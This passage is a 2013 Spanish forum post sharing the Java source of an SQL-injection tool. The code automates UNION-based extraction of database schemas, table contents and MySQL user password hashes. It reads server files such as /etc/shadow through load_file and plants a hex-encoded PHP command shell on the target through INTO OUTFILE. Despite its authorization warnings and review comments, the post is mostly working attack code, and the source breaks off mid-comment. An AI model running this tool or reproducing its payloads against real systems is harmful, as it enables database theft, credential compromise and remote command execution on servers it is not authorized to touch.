[Java] SQLI Scanner 0.2

Iniciado por BigBear, 22 Enero 2013, 01:34 AM



Traducción completa a Java de este sencillo programa para escanear páginas vulnerables a SQLi, llamado k0bra, que había hecho antiguamente en Perl. Nota: la herramienta envía payloads de ataque a la URL indicada (y una de sus opciones escribe un archivo en el servidor); úsala únicamente contra sistemas para los que tengas autorización explícita.

Con las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar número de columnas
  • Buscar automáticamente el número de la columna que muestra datos
  • Mostrar tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar información sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

    Un ejemplo de uso :



    -- == SQLI Scanner 0.2 == --


    [+] Page :
    http://localhost/sql.php?id=

    [+] Checking ...

    [+] Scanning ...

    [Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
    [Limit] : The site has 3 columns
    [Data] : The number 1 print data

    -- == OPTIONS == --

    --== information_schema.tables ==--
    [1] : Show tables
    [2] : Show columns
    [3] : Show DBS
    [4] : Show tables with other DB
    [5] : Show columns with other DB
    --== mysql.user ==--
    [6] : Show users
    --== Others ==--
    [7] : Fuzzing files with load_file
    [8] : Read a file with load_file
    [9] : Dump
    [10] : Informacion of the server
    [11] : Create a shell with into outfile
    [12] : Show Log
    [13] : Exit

    [Option] :
    10

    [+] Searching informaion ...

    [+] DB Version : 5.5.20-log
    [+] DB Name : hackman
    [+] Username : root@localhost
    [+] information_schema : on
    [+] mysqluser : on
    [-] load_file : off

    [+] Finished





    El codigo es el siguiente :


    // -- == -- == -- == ---- ==
    // SQLI Scanner 0.2       ||
    // -- == -- == -- == ---- ==
    // (C) Doddy Hackman 2013 ||
    // -- == -- == -- == ---- ==

    import java.util.Scanner;
    import java.io.*;
    import java.net.*;

    import java.util.regex.Matcher;
    import java.util.regex.Pattern;

    public class Main {

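        /**
         * Entry point. Creates the {@code logs} directory, prompts for the
         * target URL and hands it to {@link #scan}, which does the actual
         * checking (and, presumably, opens the option menu in {@code manejo}).
         *
         * <p>The URL is expected to end at the injectable parameter, e.g.
         * {@code http://localhost/sql.php?id=} (see the sample session above):
         * {@link #scan} appends its payloads directly to it.
         *
         * <p>NOTE(review): everything this program does is an active attack
         * against the host in that URL. Run it only against systems you are
         * explicitly authorized to test.
         *
         * @param args ignored
         * @throws Exception propagated from {@link #scan}
         */
        public static void main(String[] args) throws Exception {
            installer();

            // Wraps System.in; deliberately never closed, since closing it
            // would close System.in for the menu prompts that follow.
            Scanner host = new Scanner(System.in);

            System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
            System.out.println("[+] Page : ");
            String target = host.nextLine();

            scan(target);
        }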

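        /**
         * Interactive option menu for a confirmed injection point.
         *
         * <p>{@code urla} is the URL built by {@link #scan}: the literal
         * {@code hackman} stands in the column that is reflected in the page,
         * and each option substitutes its own SQL expression for it. The loop
         * never returns normally; option 13 ends the process.
         *
         * <p>Changes versus the original menu: a single {@link Scanner} on
         * {@code System.in} serves every prompt (each fresh Scanner on the same
         * stream can swallow input buffered by the previous one, which breaks
         * piped input), a non-numeric option is reported as "Bad Option"
         * instead of throwing {@code InputMismatchException}, the newline left
         * behind by {@code nextInt()} is consumed before the next
         * {@code nextLine()}, the second prompt of option 5 no longer reads
         * from the first prompt's scanner, and a normal exit returns status 0
         * instead of 1. Prompt texts are kept byte-for-byte.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @throws Exception propagated from the option handlers
         */
        private static void manejo(String urla) throws Exception {

            // One scanner for the whole menu; never closed (it wraps System.in).
            Scanner in = new Scanner(System.in);

            while (true) {
                printMenu();

                System.out.println("\n[Option] :");
                int op = readOption(in);

                switch (op) {
                    case 1:
                        schematables(urla);
                        break;
                    case 2:
                        schemacolumns(urla, askLine(in, "\n[+] Table : "));
                        break;
                    case 3:
                        getdbs(urla);
                        break;
                    case 4:
                        getablesbydb(urla, askLine(in, "\n[+] DB : "));
                        break;
                    case 5: {
                        String db = askLine(in, "\n[+] DB : ");
                        String table = askLine(in, "\n[+] Table : ");
                        getcolbydb(urla, db, table);
                        break;
                    }
                    case 6:
                        mysqluser(urla);
                        break;
                    case 7:
                        fuzzfiles(urla);
                        break;
                    case 8:
                        openfile(urla, askLine(in, "\n[+] File : "));
                        break;
                    case 9: {
                        String table = askLine(in, "\n[+] Table : ");
                        String col1 = askLine(in, "\n[+] Column 1 : ");
                        String col2 = askLine(in, "\n[+] Column 2 : ");
                        dumper(urla, table, col1, col2);
                        break;
                    }
                    case 10:
                        details(urla);
                        break;
                    case 11: {
                        // Web-root path on the server and the URL path that
                        // serves it; both are handed to intofile() unchanged.
                        String webRoot = askLine(in, "\n[+] Full Path Discloure : ");
                        String urlDir = askLine(in, "\n[+] Directory to test : ");
                        intofile(urla, webRoot, urlDir);
                        break;
                    }
                    case 12: {
                        // Per-host log under the working directory
                        // (presumably where savefile() appends its entries).
                        URL h = new URL(urla);
                        String ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";
                        System.out.println("\n[+] Check logs in : " + ruta);
                        break;
                    }
                    case 13:
                        System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
                        pauseMenu(in);
                        System.exit(0);
                        break;
                    default:
                        System.out.println("\n[-] Bad Option\n");
                        break;
                }

                pauseMenu(in);
            }
        }

        /** Prints the numbered option list shown before every prompt. */
        private static void printMenu() {
            System.out.println("\n-- == OPTIONS == --\n");
            System.out.println("--== information_schema.tables ==--");
            System.out.println("[1] : Show tables");
            System.out.println("[2] : Show columns");
            System.out.println("[3] : Show DBS");
            System.out.println("[4] : Show tables with other DB");
            System.out.println("[5] : Show columns with other DB");
            System.out.println("--== mysql.user ==--");
            System.out.println("[6] : Show users");
            System.out.println("--== Others ==--");
            System.out.println("[7] : Fuzzing files with load_file");
            System.out.println("[8] : Read a file with load_file");
            System.out.println("[9] : Dump");
            System.out.println("[10] : Informacion of the server");
            System.out.println("[11] : Create a shell with into outfile");
            System.out.println("[12] : Show Log");
            System.out.println("[13] : Exit");
        }

        /**
         * Reads the menu choice from {@code in}.
         *
         * @param in shared scanner on System.in
         * @return the number typed, or -1 when the next token is not an
         *         integer (the caller reports "Bad Option"); in both cases the
         *         rest of the line is consumed so the following
         *         {@code nextLine()} starts on a fresh line
         */
        private static int readOption(Scanner in) {
            int op = -1;
            if (in.hasNextInt()) {
                op = in.nextInt();
            }
            in.nextLine();
            return op;
        }

        /**
         * Prints {@code prompt} on its own line and returns the next line typed.
         *
         * @param in     shared scanner on System.in
         * @param prompt text shown before reading
         * @return the line entered, without its terminator
         */
        private static String askLine(Scanner in, String prompt) {
            System.out.println(prompt);
            return in.nextLine();
        }

        /**
         * Same banner and wait-for-Enter as {@link #continuar()}, but on the
         * shared scanner so no buffered input is lost between prompts.
         *
         * @param in shared scanner on System.in
         */
        private static void pauseMenu(Scanner in) {
            System.out.println("\n[+] Finished\n");
            in.nextLine();
        }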

        /**
         * Prints the "[+] Finished" banner and blocks until the user presses
         * Enter, so the output of the previous option stays on screen before
         * the menu is redrawn.
         *
         * @throws Exception never in practice; kept for signature compatibility
         */
        private static void continuar() throws Exception {
            System.out.println("\n[+] Finished\n");
            // Fresh scanner on stdin; the line read is discarded.
            new Scanner(System.in).nextLine();
        }

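        /**
         * Ensures the {@code logs} directory exists under the working
         * directory; option 12 reports the per-host log as
         * {@code <user.dir>/logs/<host>.txt}, so later log writes presumably
         * go there.
         *
         * <p>Unlike the original, a failed {@code mkdirs()} is reported instead
         * of silently ignored, so a missing directory is visible before the
         * first log write fails.
         *
         * @throws Exception never in practice; kept for signature compatibility
         */
        private static void installer() throws Exception {

            File logDir = new File("logs");

            if (logDir.isDirectory()) {
                return;
            }

            // mkdirs() may return false if another process created the
            // directory in between, hence the second isDirectory() check.
            if (!logDir.mkdirs() && !logDir.isDirectory()) {
                System.out.println("[-] Could not create log directory : " + logDir.getAbsolutePath());
            }

        }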

        /**
         * Option 11: writes a PHP file ({@code cmd.php}) into the target's web
         * root through the injection with {@code INTO OUTFILE}, then requests
         * it over HTTP to check that it is being served.
         *
         * <p>NOTE(review): this plants an executable file on the target and is
         * the only option here that modifies the remote system. It is only
         * defensible inside an authorized engagement whose rules of engagement
         * explicitly allow it, and the file must be removed afterwards.
         *
         * <p>Both {@code fpd} and {@code dir} are spliced into the URLs as-is;
         * whether they get URL-encoded depends on {@link #toma}, which is not
         * visible here (the commented example in {@code main} passes a path
         * containing spaces).
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @param fpd  absolute filesystem path of the web root on the server
         *             (what the "Full Path Discloure" prompt asks for)
         * @param dir  URL path under which that directory is served
         * @throws Exception propagated from {@link #toma}
         */
        private static void intofile(String urla, String fpd, String dir) throws Exception {

            String linea;
            String lugar;
            String lugardos;
            String webtest;
            String web1;
            String formandoweb;
            String code;

            // Hex literal of the file contents written by OUTFILE; the
            // "Mini Shell By Doddy" string matched below is its <title>.
            linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
            lugar = fpd + "/cmd.php";     // filesystem path OUTFILE writes to
            lugardos = dir + "/cmd.php";  // URL path used to fetch it back

            URL h = new URL(urla);

            System.out.println("\n[+] Checking ...\n");

            // The verification URL is rebuilt from the host only and always
            // uses plain http, whatever scheme urla had.
            webtest = "http://" + h.getHost() + lugardos;
            Pattern uno = null;
            Matcher dos = null;

            // The hex literal takes the reflected column's place and the
            // OUTFILE clause is appended with the path in single quotes.
            web1 = urla.replace("hackman", linea);
            formandoweb = web1 + "+into+outfile+'" + lugar + "'--";

            // First request performs the write; its response is discarded.
            // Second request fetches the written file and is what is checked.
            code = toma(formandoweb);
            code = toma(webtest);

            uno = Pattern.compile("Mini Shell By Doddy");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[Shell UP] : " + webtest);
                savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
            } else {
                // Covers both a failed write and a file that is not served.
                System.out.println("[-] Error");
            }

        }

        /**
         * Option 8: reads one file from the database server's filesystem
         * through the injection with MySQL {@code load_file()} and prints and
         * logs whatever comes back.
         *
         * <p>The path is hex-encoded by {@link #encodehex} so the query needs
         * no quote characters, and the result is fenced on both sides with the
         * marker {@code ERTOR854} (spelled out as {@code char(...)}) so it can
         * be cut out of the surrounding HTML. Option 10 reports whether
         * {@code load_file} works at all on the target ("load_file : off" in
         * the sample session).
         *
         * <p>NOTE(review): the pattern is compiled without {@code DOTALL}, so
         * {@code .} does not cross line terminators; a file whose contents are
         * echoed over several lines is reported as "Not Found". Confirm against
         * a multi-line file before trusting a negative.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @param file absolute path on the server, as typed by the user
         * @throws Exception propagated from {@link #toma}
         */
        private static void openfile(String urla, String file) throws Exception {

            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            archivo = encodehex(file);

            // char(69,82,84,79,82,56,53,52) is the "ERTOR854" fence.
            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

            System.out.println("\n[+] Reading ...\n");

            code = toma(web1);

            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {

                System.out.println("[+] File Found : " + file);
                System.out.println("\n[Source Start]\n");
                System.out.println(dos.group(1));
                System.out.println("\n[Source End]\n");

                // File contents go verbatim into the per-host log.
                savefile(urla, "\r\n" + "[+] File Found : " + file);
                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                savefile(urla, dos.group(1));
                savefile(urla, "\r\n" + "[Source End]" + "\r\n");

            } else {
                System.out.println("[-] Not Found");
            }

        }

        /**
         * Option 7: tries the same {@code load_file()} read as
         * {@link #openfile} against a built-in list of well-known paths and
         * prints/logs every file that comes back.
         *
         * <p>The list mixes Windows (XAMPP, {@code boot.ini}) and Unix targets:
         * account and credential files, web-server, PHP, MySQL and FTP
         * configuration, and log files. Every entry is one HTTP request to the
         * target, so a full run is roughly 250 requests and is noisy.
         * {@code C:/xampp/htdocs/aca.txt} is listed twice.
         *
         * <p>Extraction is the same as in {@link #openfile}: the path is
         * hex-encoded and the content is fenced with {@code ERTOR854}; the
         * regex is compiled without {@code DOTALL}, so content spanning several
         * lines does not match and the file is silently skipped.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @throws Exception propagated from {@link #toma}
         */
        private static void fuzzfiles(String urla) throws Exception {

            String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", 
"/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", 
"/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", 
"C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            System.out.println("\n[+] Searching files with load_file() ....\n");

            // One request per candidate path; the same fence pattern is
            // recompiled on every iteration.
            for (int count = 0; count < archivos.length; count++) {

                archivo = encodehex(archivos[count]);

                web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

                code = toma(web1);

                uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
                dos = uno.matcher(code);

                if (dos.find()) {

                    System.out.println("[+] File Found : " + archivos[count]);
                    System.out.println("\n[Source Start]\n");
                    System.out.println(dos.group(1));
                    System.out.println("\n[Source End]\n");

                    // File contents go verbatim into the per-host log.
                    savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
                    savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                    savefile(urla, dos.group(1));
                    savefile(urla, "\r\n" + "[Source End]" + "\r\n");

                }

            }

        }

        /**
         * Option 9: dumps two columns of a table through the injection.
         *
         * <p>Two queries are derived from the placeholder: {@code web1} selects
         * {@code count(*)} and {@code web2} selects {@code col1} and
         * {@code col2}, each value fenced with the marker {@code 0x4b30425241}
         * ("K0BRA"). The count is read first, then one {@code LIMIT x,1}
         * request per row is made and each row is printed and appended to the
         * per-host log.
         *
         * <p>NOTE(review): the loop condition {@code x <= finals} issues one
         * request more than there are rows (the last offset equals the count
         * and yields no row). Unlike the schema helpers, {@code tabla},
         * {@code col1} and {@code col2} go into the query unencoded, and the
         * count is parsed with an unguarded {@code Integer.parseInt}, so a
         * non-numeric match propagates a {@code NumberFormatException} all the
         * way out of {@code main}. Whatever is dumped here (often credentials)
         * is written in plaintext to the log; treat the {@code logs/}
         * directory as sensitive material.
         *
         * @param urla  injection URL containing the {@code hackman} placeholder
         * @param tabla table to read from, as typed by the user
         * @param col1  first column name
         * @param col2  second column name
         * @throws Exception propagated from {@link #toma}
         */
        private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            // Row-count query and two-column row query; "+from+..." is
            // appended at request time.
            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");

            code = toma(web1 + "+from+" + tabla + "--");

            System.out.println("\n[+] Getting Values ...");

            uno = Pattern.compile("K0BRA(.*?)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Values Founds : " + dos.group(1));
                savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");

                    // Greedy groups: a value that itself contains "K0BRA"
                    // would shift the split.
                    uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] " + col1 + " : " + dos.group(1));
                        System.out.println("[+] " + col2 + " : " + dos.group(2));

                        savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
                        savefile(urla, "[+] " + col2 + " : " + dos.group(2));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        /**
         * Option 6: reads {@code Host}, {@code User} and {@code Password} for
         * every row of {@code mysql.user} through the injection.
         *
         * <p>Same count-then-{@code LIMIT x,1} pattern as {@link #dumper}. The
         * three values are separated by distinct markers so one regex can split
         * them: {@code 0x4b30425241} is "K0BRA", {@code 0x4B3042524131} is
         * "K0BRA1" and {@code 0x4B3042524132} is "K0BRA2". Needs read access to
         * {@code mysql.user}; the "mysqluser : on" line of option 10 in the
         * sample session presumably reports that.
         *
         * <p>NOTE(review): the {@code Password} column is what the sample
         * target (MySQL 5.5) has; on newer servers that store the hash in a
         * different column the per-row query yields no match and the rows are
         * silently skipped — confirm before trusting an empty result. The
         * password hashes are appended in plaintext to the per-host log;
         * protect or delete that file after the engagement. As in
         * {@link #dumper}, the loop runs {@code x <= finals} (one request past
         * the last row) and {@code Integer.parseInt} on the count is unguarded.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @throws Exception propagated from {@link #toma}
         */
        private static void mysqluser(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");

            System.out.println("\n[+] Searching mysql.user ....");

            code = toma(web1 + "+from+mysql.user--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Users Found : " + dos.group(1));

                savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");

                    // Host between K0BRA, user between K0BRA1, hash between K0BRA2.
                    uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] Host : " + dos.group(1));
                        System.out.println("[+] Username : " + dos.group(2));
                        System.out.println("[+] Password : " + dos.group(3));

                        savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
                        savefile(urla, "[+] Username : " + dos.group(2));
                        savefile(urla, "[+] Password : " + dos.group(3));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        /**
         * Option 5: lists the columns of table {@code tab} in database
         * {@code db} from {@code information_schema.columns}.
         *
         * <p>Both names are hex-encoded with {@link #encodehex} so the
         * {@code WHERE} clause needs no quotes. A {@code count(*)} query is
         * issued first and then one {@code LIMIT x,1} query per column; each
         * result is fenced with the {@code 0x4b30425241} ("K0BRA") marker and
         * cut out with a regex.
         *
         * <p>NOTE(review): the log line writes the pair as
         * {@code tab + "." + db}, i.e. "table.database" — presumably
         * {@code db.tab} was meant. The loop runs {@code x <= finals} (one
         * request past the last row) and the count goes through an unguarded
         * {@code Integer.parseInt}; the same count-then-iterate code is
         * repeated in {@link #getablesbydb}, {@link #getdbs},
         * {@link #schemacolumns} and {@link #schematables}.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @param db   database (table_schema) name, as typed by the user
         * @param tab  table name, as typed by the user
         * @throws Exception propagated from {@link #toma}
         */
        private static void getcolbydb(String urla, String db, String tab) throws Exception {

            String web1;
            String web2;
            String code;

            String dbf;
            String table;

            int x;

            Pattern uno = null;
            Matcher dos = null;

            dbf = encodehex(db);
            table = encodehex(tab);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                // Logged as "<table>.<db>" (see note above).
                savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        /**
         * Option 4: lists the tables of database {@code db} from
         * {@code information_schema.tables} ({@code table_schema = db}).
         *
         * <p>{@code db} is hex-encoded with {@link #encodehex} so the
